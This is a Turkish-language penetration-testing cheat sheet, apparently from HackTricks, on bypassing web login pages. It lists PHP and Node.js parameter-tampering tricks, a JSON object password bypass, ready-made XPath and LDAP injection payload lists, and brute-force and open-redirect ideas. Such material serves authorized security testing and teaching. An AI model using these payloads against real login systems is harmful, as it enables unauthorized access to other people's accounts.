Giriş Atlatma
Reading time: 4 minutes
tip
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- Bize katılın 💬 Discord grubuna veya telegram grubuna veya bizi takip edin Twitter'da 🐦 @hacktricks_live.
- Hacking ipuçlarını paylaşın, HackTricks ve HackTricks Cloud github reposuna PR göndererek.
Normal girişi atlatma
Bir giriş sayfası bulursanız, bunu atlatmak için deneyebileceğiniz bazı teknikler burada:
- Sayfa içindeki yorumları kontrol edin (aşağı kaydırın ve sağa mı?)
- Kısıtlı sayfalara doğrudan erişip erişemeyeceğinizi kontrol edin
- Parametreleri göndermemeye dikkat edin (hiç göndermeyin veya sadece 1 tane gönderin)
- PHP karşılaştırma hatasını kontrol edin:
user[]=a&pwd=b
,user=a&pwd[]=b
,user[]=a&pwd[]=b
- İçerik türünü json olarak değiştirin ve json değerleri gönderin (bool true dahil)
- POST'un desteklenmediğini belirten bir yanıt alırsanız, JSON'u gövdeye GET isteği ile
Content-Type: application/json
ile göndermeyi deneyebilirsiniz - Nodejs potansiyel ayrıştırma hatasını kontrol edin (okuyun şunu):
password[password]=1
- Nodejs bu yükü aşağıdaki gibi bir sorguya dönüştürecektir:
SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``
password=password=1
;
bu da şifre bitinin her zaman doğru olmasını sağlar. - Eğer bir JSON nesnesi gönderebiliyorsanız, girişi atlatmak için
"password":{"password": 1}
gönderebilirsiniz. - Bu girişi atlatmak için hala geçerli bir kullanıcı adı bilmeniz ve göndermeniz gerektiğini unutmayın.
mysql.createConnection
çağrısında"stringifyObjects":true
seçeneğini eklemek, parametre olarakObject
geçirildiğinde tüm beklenmedik davranışları engelleyecektir.- Kimlik bilgilerini kontrol edin:
- Kullanılan teknoloji/platformun Varsayılan kimlik bilgileri
- Yaygın kombinasyonlar (root, admin, password, teknolojinin adı, bu şifrelerden biriyle varsayılan kullanıcı).
- Cewl kullanarak bir sözlük oluşturun, varsayılan kullanıcı adı ve şifreyi (varsa) ekleyin ve tüm kelimeleri kullanıcı adı ve şifre olarak kullanarak brute-force deneyin.
- Daha büyük bir sözlük kullanarak Brute-force (Brute force)
SQL Enjeksiyonu ile kimlik doğrulama atlatma
Giriş atlatmak için SQL enjeksiyonları ile ilgili birkaç hile bulabilirsiniz.
Aşağıdaki sayfada SQL Enjeksiyonları ile giriş atlatmak için denemek üzere bir özel liste bulabilirsiniz:
NoSQL Enjeksiyonu ile kimlik doğrulama atlatma
Giriş atlatmak için NoSQL Enjeksiyonları ile ilgili birkaç hile bulabilirsiniz.
NoSQL Enjeksiyonları parametre değerlerini değiştirmeyi gerektirdiğinden, bunları manuel olarak test etmeniz gerekecek.
XPath Enjeksiyonu ile kimlik doğrulama atlatma
Giriş atlatmak için XPath Enjeksiyonu ile ilgili birkaç hile bulabilirsiniz
' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2
LDAP Injection kimlik doğrulama atlatma
Burada LDAP Injection ile giriş atlatmak için birkaç hile bulabilirsiniz.
*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|
Beni Hatırla
Eğer sayfada "Beni Hatırla" işlevi varsa, nasıl uygulandığını kontrol edin ve bunu diğer hesapları ele geçirmek için kötüye kullanıp kullanamayacağınıza bakın.
Yönlendirmeler
Sayfalar genellikle giriş yaptıktan sonra kullanıcıları yönlendirir, bu yönlendirmeyi değiştirip Açık Yönlendirme oluşturup oluşturamayacağınıza bakın. Kullanıcıyı kendi web sitenize yönlendirirseniz bazı bilgileri (kodlar, çerezler...) çalabilirsiniz.
Diğer Kontroller
- Giriş işlevini kötüye kullanarak kullanıcı adlarını numaralandırıp numaralandıramayacağınıza bakın.
- Şifre/hassas bilgi formları girişinde otomatik tamamlama özelliğinin aktif olup olmadığını kontrol edin:
<input autocomplete="false">
Otomatik Araçlar
tip
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- Bize katılın 💬 Discord grubuna veya telegram grubuna veya bizi takip edin Twitter'da 🐦 @hacktricks_live.
- Hacking ipuçlarını paylaşın, HackTricks ve HackTricks Cloud github reposuna PR göndererek.